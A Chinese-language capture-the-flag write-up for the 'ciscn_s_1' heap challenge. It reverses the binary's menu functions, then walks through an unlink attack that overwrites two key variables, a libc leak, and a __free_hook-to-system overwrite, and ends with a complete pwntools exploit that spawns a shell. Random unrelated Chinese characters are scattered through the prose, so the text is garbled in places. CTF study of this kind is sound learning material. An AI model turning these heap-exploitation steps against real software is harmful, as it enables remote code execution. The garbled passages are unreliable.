對(duì)數(shù)據(jù)挺敏感的一道題
1.檢查
2.反匯編
有四個(gè)功能
unsigned __int64 menu()
{
unsigned __int64 v0; // ST08_8
v0 = __readfsqword(0x28u);
puts("1.malloc");
puts("2.free");
puts("3.edit");
puts("4.show");
return __readfsqword(0x28u) ^ v0;
}
ma()
很平常的一個(gè)創(chuàng)建chunk的函數(shù)鸡岗,其中
0x6020E0 記錄了chunk的地址,0x602060記錄了chunk的大小狰贯,最多可以有32個(gè)chunk
ed()
有了一個(gè)新的固定地址:0x6022BC
sh()
這里也記錄下了一個(gè)新的地址:0x6022B8
3.思路
整理信息
幾個(gè)固定地址從低到高如下
| 地址 | 變量名 |
|---|---|
| 0x602060 | len |
| 0x6020E0 | heap |
| 0x6022B8 | key2 |
| 0x6022BC | key1 |
- 創(chuàng)建chunk的時(shí)候,返回了chunk的地址赏廓,heap有用做管理chunk地址的全局指針涵紊,具有 Unlink 漏洞的特征
- 要getshell,就要修改程序的got表幔摸,那么就要進(jìn)行信息泄露摸柄,但是 key2 鎖住了對(duì)
sh()的使用,那么就必須修改 key2 的值既忆。發(fā)現(xiàn) key1 的地址和 key2 的相近驱负,就可以順便修改 key1的值嗦玖,從而可以多次使用ed() - 經(jīng)過(guò)遠(yuǎn)程測(cè)試可以發(fā)現(xiàn),可以連續(xù)對(duì)同一chunk使用
fr跃脊,那么環(huán)境因該是 libc-2.27即以上的環(huán)境宇挫,BUUOJ中明確給出了環(huán)境為 Ubuntu18
攻擊思路
這里有兩種思路,具體看你對(duì)數(shù)據(jù)是否敏感
-
簡(jiǎn)單的是小伙伴cnitlrt的思路酪术,特殊點(diǎn)是發(fā)現(xiàn)bss端上(cnitlrt的簡(jiǎn)書(shū))
如下
.bss:0000000000602060 len_602060 dd 20h dup(?) ; DATA XREF: ma+CA↑o .bss:0000000000602060 ; fr+AC↑o ... .bss:00000000006020E0 public heap_6020E0 .bss:00000000006020E0 ; void *heap_6020E0[32] .bss:00000000006020E0 heap_6020E0 dq 20h dup(?) ; DATA XREF: ma+49↑o .bss:00000000006020E0 ; ma+B2↑o ... .bss:00000000006021E0 public pro .bss:00000000006021E0 pro db ? ; .bss:00000000006021E1 db ? ; .bss:00000000006021E2 db ? ; .bss:00000000006021E3 db ? ; ..................... .. . . .bss:00000000006022B8 public key2_6022B8 .bss:00000000006022B8 key2_6022B8 dd ? ; DATA XREF: sh+17↑r .bss:00000000006022BC public key1_6022BC .bss:00000000006022BC key1_6022BC dd ? ; DATA XREF: ed+17↑r .bss:00000000006022BC ; ed+EC↑r ... .bss:00000000006022BC _bss ends在 heap_6020E0中器瘪,每個(gè)chunk占8字節(jié),第32個(gè)就是 0x6020E0+832= 0x6021e0*绘雁,剛好在 pro 段上面橡疼,而 pro 段距離 key1 相差 0xD8,如果通過(guò) Unlink 到這里庐舟,直接
ma的時(shí)候向chunk中添加數(shù)據(jù)就可以直接覆寫(xiě) key1和 key2- 1. 使用 Unlink 修改 key1 和 key2
- 2. 泄露 free_hook 和 _libc_system
- 3. Tcache_Dup后調(diào)用 free_hook 得到shell
-
還有一種衰齐,來(lái)自于博客https://blog.csdn.net/qq_37433000/article/details/107026628
這種方法非常復(fù)雜,但是不需要對(duì)數(shù)據(jù)太敏感继阻,通過(guò)在libc-2.27中的 chunk_overlapping 來(lái)修改 key1和 key2
這里先講第一種
4.GDB
1. 使用 Unlink 修改 key1 和 key2
-
1.為了之后得到unsortedbin耻涛,這里我們需要布局,同時(shí)這里的heap[32]->size瘟檩,決定了之后能覆蓋的大小
#get unsorted bin for i in xrange(7): malloc(i,0xf8,str(i)*8) malloc(7,0xf8,'7'*8) malloc(32,0xf8,'20202020') malloc(8,0xf8,'8'*8) malloc(9,0xf8,"/bin/sh\x00") -
2.為了能夠覆蓋到 key1抹缕,這里就選最后一個(gè)chunk:heap[32]為要unlink的chunk
addr = 0x6020e0+8*32 payload = p64(0)+p64(0xf1) payload += p64(addr-0x18)+p64(addr-0x10) payload = payload.ljust(0xf0,"\x00") payload += p64(0xf0) -
3.先填滿tcache,要不然unlink不會(huì)是雙鏈表
for i in xrange(7): free(i+1) -
4.Unlink攻擊
edit(32,payload) free(8)
2. 泄露 free_hook 和 _libc_system
-
1.肯定要改寫(xiě)兩個(gè) key 的值
payload = p64(0x0000000000601fa0) payload += p64(pro-0x18)+p64(pro-0x18) payload += p64(pro) payload = payload.ljust(0xf0,'\x00') payload += p64(0x0000000a00000001) edit(32,payload)之前我們把heap[32]改成了 0x6021C8墨辛,那這次就是直接對(duì)0x6021C8編輯卓研,反推算可以0x6021C8原本記錄的是heap[29],那這段payload就把heap[32]改成了 0x06021e0睹簇。同時(shí)該chunk距離 key 比較近奏赘,就可以改寫(xiě)
leak.png -
2.直接調(diào)用
shleak-2.png
3. Tcache_Dup后調(diào)用 free_hook 得到shell
其實(shí)這個(gè)也不算啥攻擊方式,就是我們控制了一個(gè)指針
edit(32,p64(free_hook))
edit(32,p64(system))
free(9)
sh.interactive()
其實(shí)從上面那步就可以看出來(lái)太惠,每次對(duì)heap[32]進(jìn)行編輯時(shí)磨淌,我們都可以修改他得值,從而由 heap[32] -> free_hook凿渊,然后再次編輯就是在free_hook上面寫(xiě)了
5.exp
from pwn import *
elf = ELF("ciscn_s_1")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
sh = 0
def malloc(idx,sz,content):
sh.sendlineafter("4.show\n","1")
sh.sendlineafter("index:",str(idx))
sh.sendlineafter("size:",str(sz))
sh.recvuntil("gift: ")
addr = u64(sh.recv(6).ljust(8,"\x00"))
sh.sendafter("content:",content)
return addr
def free(idx):
sh.sendlineafter("4.show\n","2")
sh.sendlineafter("index:",str(idx))
def edit(idx,content):
sh.sendlineafter("4.show\n","3")
sh.sendlineafter("index:",str(idx))
sh.sendafter("content:",content)
def show(idx):
sh.sendlineafter("4.show\n","4")
sh.sendlineafter("index:",str(idx))
def main(ip,port,debug,mode):
global sh
if debug==0:
context.log_level = "debug"
else:
pass
if mode==0:
sh = process("ciscn_s_1")
else:
sh = remote(ip,port)
key1 = 0x06022BC
key2 = 0x06022B8
pro = 0x6021E0
#get unsorted bin
for i in xrange(7):
malloc(i,0xf8,str(i)*8)
malloc(7,0xf8,'7'*8)
malloc(32,0xf8,'20202020')
malloc(8,0xf8,'8'*8)
malloc(9,0xf8,"/bin/sh\x00")
addr = 0x6020e0+8*32
payload = p64(0)+p64(0xf1)
payload += p64(addr-0x18)+p64(addr-0x10)
payload = payload.ljust(0xf0,"\x00")
payload += p64(0xf0)
for i in xrange(7):
free(i+1)
edit(32,payload)
free(8)
payload = p64(0x0000000000601fa0)
payload += p64(pro-0x18)+p64(pro-0x18)
payload += p64(pro)
payload = payload.ljust(0xf0,'\x00')
payload += p64(0x0000000a00000001)
edit(32,payload)
show(29)
libc_base = u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-libc.sym["free"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
success("libc base ==> "+hex(libc_base))
success("free_hook ==> "+hex(free_hook))
success("_libc_system ==> "+hex(system))
edit(32,p64(free_hook))
edit(32,p64(system))
free(9)
sh.interactive()
if __name__ == '__main__':
main(0,0,0,0)
